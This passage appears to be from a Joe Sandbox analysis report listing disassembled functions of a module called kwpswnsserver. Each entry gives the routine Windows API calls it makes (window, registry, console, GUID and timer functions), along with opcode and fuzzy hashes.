                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyInflateInvalidateUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 3040190709-0
                                                                  • Opcode ID: 2342155dbcd5cc959e63941d92fb611abdf4a95f628237478911b87ce025b988
                                                                  • Instruction ID: 8d7fd9beadbac90c3996ab37bd6d33f135b18234e7a842ad5a733c28e5fc5c5e
                                                                  • Opcode Fuzzy Hash: 2342155dbcd5cc959e63941d92fb611abdf4a95f628237478911b87ce025b988
                                                                  • Instruction Fuzzy Hash: B801AD3260030A9FDB24DF68CC8AEAB7BB8FF8A314F514669E45AE7191CB301905CB50
                                                                  Function 6C882240 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C882260
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 6C88226F
                                                                  • IsWindow.USER32(00000000), ref: 6C882280
                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 6C882290
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID:
                                                                  • API String ID: 847901565-0
                                                                  • Opcode ID: 29f829aec8126f554ce783c6fbc27b2fa3dfb12f5f0607e9c43d2bcf2d074c67
                                                                  • Instruction ID: 45a7a0790d6d3db73adddfd2b127c5fd36057c3e927ca7d7e201ab75170b594f
                                                                  • Opcode Fuzzy Hash: 29f829aec8126f554ce783c6fbc27b2fa3dfb12f5f0607e9c43d2bcf2d074c67
                                                                  • Instruction Fuzzy Hash: C601A731305325AFDF25AB788D48A7E7678AB86739B10076CFC12D66C1DB689802D751
                                                                  Function 6C88ED6E Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 6C88ED75
                                                                  • GetTopWindow.USER32(00000000), ref: 6C88EDB8
                                                                  • GetWindow.USER32(00000000,00000002), ref: 6C88EDDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  • Opcode ID: 2e15f01f14f006ea071dc2f263d68af07faa62443a4f164b1ddc6f9e6158aa25
                                                                  • Instruction ID: 075305cc926e9fadfd894c4111ce646147b5b6299021d77ab4bc16fc7df9c69b
                                                                  • Opcode Fuzzy Hash: 2e15f01f14f006ea071dc2f263d68af07faa62443a4f164b1ddc6f9e6158aa25
                                                                  • Instruction Fuzzy Hash: 56010C3610222ABBCF226F99CE04EDE3B36BF05359F008910FE14949A0C735C565DBD1
                                                                  Function 6C88ECF7 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 6C88ED01
                                                                  • GetTopWindow.USER32(00000000), ref: 6C88ED0E
                                                                    • Part of subcall function 6C88ECF7: GetWindow.USER32(00000000,00000002), ref: 6C88ED5D
                                                                  • GetTopWindow.USER32(?), ref: 6C88ED42
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  • Opcode ID: 22abaa88cc2a603bad84d1a3aacfb633dfe95e40b89cc2207dad4a57a5121051
                                                                  • Instruction ID: 47bf201e3fbb1897cc8891d0b7b79544e75413be3073f4676be33837b49ef59c
                                                                  • Opcode Fuzzy Hash: 22abaa88cc2a603bad84d1a3aacfb633dfe95e40b89cc2207dad4a57a5121051
                                                                  • Instruction Fuzzy Hash: 2601A23D10362AA7DB321F69CE04ACE3B79AF0635AF048A20FC1494D50D731D51987D0
                                                                  Function 6C9EA579 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000), ref: 6C9EA590
                                                                  • GetLastError.KERNEL32(?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?,?,?,6C9E19DC,00000000), ref: 6C9EA59C
                                                                    • Part of subcall function 6C9EA5ED: CloseHandle.KERNEL32(FFFFFFFE,6C9EA5AC,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?,?), ref: 6C9EA5FD
                                                                  • ___initconout.LIBCMT ref: 6C9EA5AC
                                                                    • Part of subcall function 6C9EA5CE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9EA56A,6C9E954D,?,?,6C9E2096,?,00000000,00000000,?), ref: 6C9EA5E1
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?), ref: 6C9EA5C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 6204aa0ad1bf34ecbf222f101c5b55cf9389f2b0747a29438bbb446d13ef1d70
                                                                  • Instruction ID: b90a73ef5b0cc9a36134242e47a63cabd4292276dc80f68d2bb3400c198c5ea7
                                                                  • Opcode Fuzzy Hash: 6204aa0ad1bf34ecbf222f101c5b55cf9389f2b0747a29438bbb446d13ef1d70
                                                                  • Instruction Fuzzy Hash: 33F0F836600229BBCF262E958C0898D3E76EF5A7A4B488210FA0885620CA32C961DB90
                                                                  Function 6C9C20C1 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6C9C20D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C20E2
                                                                  • GetCurrentProcessId.KERNEL32 ref: 6C9C20EB
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C9C20F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 80f54591e7759b236ac970982dca641498ae53682056352c2092024cab0cceac
                                                                  • Instruction ID: c3676ea01631b1b6fd533f9dd8c192434b8f8c37e11c9a2c0ece8cd3e8c0e066
                                                                  • Opcode Fuzzy Hash: 80f54591e7759b236ac970982dca641498ae53682056352c2092024cab0cceac
                                                                  • Instruction Fuzzy Hash: 6BF0B235D0021DEBCF04EBB4CA4999EFBF8EF1D304B918696A812E7100E730AB458B50
                                                                  Function 6C8C6EB2 Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8C7140: GetStockObject.GDI32(00000000), ref: 6C8C7168
                                                                    • Part of subcall function 6C8C7140: InflateRect.USER32(?,000000FF,000000FF), ref: 6C8C7217
                                                                  • ReleaseCapture.USER32 ref: 6C8C6EBD
                                                                  • GetDesktopWindow.USER32 ref: 6C8C6EC3
                                                                  • LockWindowUpdate.USER32(00000000,00000000), ref: 6C8C6ED3
                                                                  • ReleaseDC.USER32(?,?), ref: 6C8C6EE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                  • String ID:
                                                                  • API String ID: 1260764132-0
                                                                  • Opcode ID: 391b58471f4dcc8f0f84125e243afe8bf71624061d867d15b6d9b291b77cd821
                                                                  • Instruction ID: 382400396268d4d06b41ae60ce1dbbc13586b04eed9c2284f8f24ca0d925e4f5
                                                                  • Opcode Fuzzy Hash: 391b58471f4dcc8f0f84125e243afe8bf71624061d867d15b6d9b291b77cd821
                                                                  • Instruction Fuzzy Hash: D7E012313013129BDB382B75DE1CB963B35BF8571EF108929E649D5590CF7694128750
                                                                  Function 6C89CC93 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 3732870572-1956417402
                                                                  • Opcode ID: 9f221cd8d1bb25602341636392b1064fca7b3fc4da6ec9d4ef4ead7b48c425fb
                                                                  • Instruction ID: 09546f25a69e8c53b40ce3f96ed3246dafe64c073fd341239d3982819fa1a50c
                                                                  • Opcode Fuzzy Hash: 9f221cd8d1bb25602341636392b1064fca7b3fc4da6ec9d4ef4ead7b48c425fb
                                                                  • Instruction Fuzzy Hash: D4615970F042599FEB21EFADC9807AEBFF5AF49308F244859E49197A52C3368941CB61
                                                                  Function 6C8A8520 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A8527
                                                                  • CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 6C8A8582
                                                                  Strings
                                                                  • %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 6C8A85CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateGuidH_prolog3_
                                                                  • String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
                                                                  • API String ID: 2971167768-1017209998
                                                                  • Opcode ID: 1c6b971c5e5e119d0b839638ea92efb413597e365b0115f898c9a27d1b81f312
                                                                  • Instruction ID: 5a6b74a681d1c3a42cc9bb7f7a4c3964bfb0276ddac800234b891e681ed2b3a7
                                                                  • Opcode Fuzzy Hash: 1c6b971c5e5e119d0b839638ea92efb413597e365b0115f898c9a27d1b81f312
                                                                  • Instruction Fuzzy Hash: 8541A5719011599ECB25DBECC954AFEBBF9AF09218F144859E450B7680DB389D09CB70
                                                                  Function 6C8FE220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000008,6C8B0617,?,MFCToolBars,?,000000A8), ref: 6C8FE372
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3QueryValue
                                                                  • String ID: SOFTWARE\
                                                                  • API String ID: 2373586757-3302998844
                                                                  • Opcode ID: 1439b3f74dbbbee11597fc06715c33ea5d9eeea2ae211f8a363424601e926331
                                                                  • Instruction ID: 2e577d18cff77eaee353b3868954f82c2cbd0de45d9b1b99a0247243a6c9ea2d
                                                                  • Opcode Fuzzy Hash: 1439b3f74dbbbee11597fc06715c33ea5d9eeea2ae211f8a363424601e926331
                                                                  • Instruction Fuzzy Hash: F831C271201614AFDF249BA8CE84DBE776AEF45218B108869F424ABF90DB70DD45CBE0
                                                                  Function 6C9D8D83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6C9D8C84,?,?,00000000,00000000,00000000,?), ref: 6C9D8DA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: d54cce17c446722c818a5753b532deaadd4340c9a1e4203fe9ef634155d92e7a
                                                                  • Instruction ID: 379d7af45014fcc068bad9fdeba0fad39f79f36bd76427c7a0071a48ae5d230b
                                                                  • Opcode Fuzzy Hash: d54cce17c446722c818a5753b532deaadd4340c9a1e4203fe9ef634155d92e7a
                                                                  • Instruction Fuzzy Hash: 18419F7190060AAFCF09DF94CC40AEE7BB9BF58308F16915AF914BA651D331E950CFA5
                                                                  Function 6C95E358 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C95E35F
                                                                    • Part of subcall function 6C95D1C2: __EH_prolog3.LIBCMT ref: 6C95D1C9
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                    • Part of subcall function 6C95EADA: __EH_prolog3.LIBCMT ref: 6C95EAE1
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C95E497
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Object
                                                                  • String ID:
                                                                  • API String ID: 1838513595-3916222277
                                                                  • Opcode ID: 7fdebb6abc5458d0146534f14167041b9cfbba4fa80e90244fd64cc7840dce03
                                                                  • Instruction ID: 5bf3ea3a949716692dc2d3b5e4d8438e22b2d85316b0d97d61e575196de57635
                                                                  • Opcode Fuzzy Hash: 7fdebb6abc5458d0146534f14167041b9cfbba4fa80e90244fd64cc7840dce03
                                                                  • Instruction Fuzzy Hash: 42417D74E0135ADBCF15DFA4C990BEEB778BF24318F504529E41167B80DB78AA19CBA0
                                                                  Function 6C9D85EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9D8866
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ___except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3493665558-3733052814
                                                                  • Opcode ID: 3e5b60dfbb12aa9eec8eb81243606112c5f75e4a0a042812c57dac582a7e1bd1
                                                                  • Instruction ID: e3e5fb3ee444d844622b819a0592389d61c734cead91946790b31c25ddaaef9f
                                                                  • Opcode Fuzzy Hash: 3e5b60dfbb12aa9eec8eb81243606112c5f75e4a0a042812c57dac582a7e1bd1
                                                                  • Instruction Fuzzy Hash: 59312C71404A09EFCF1A4F41CC40AAA3B69FF15319B16D59BFDA429913C332E8A1CBC6
                                                                  Function 6C89AAF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,?,?,00000000), ref: 6C89AB28
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89AB31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Value
                                                                  • String ID: A
                                                                  • API String ID: 299128501-3554254475
                                                                  • Opcode ID: 9713aeec8a397756853abcc263abd98413a7510641be0eda382e506dd0f941db
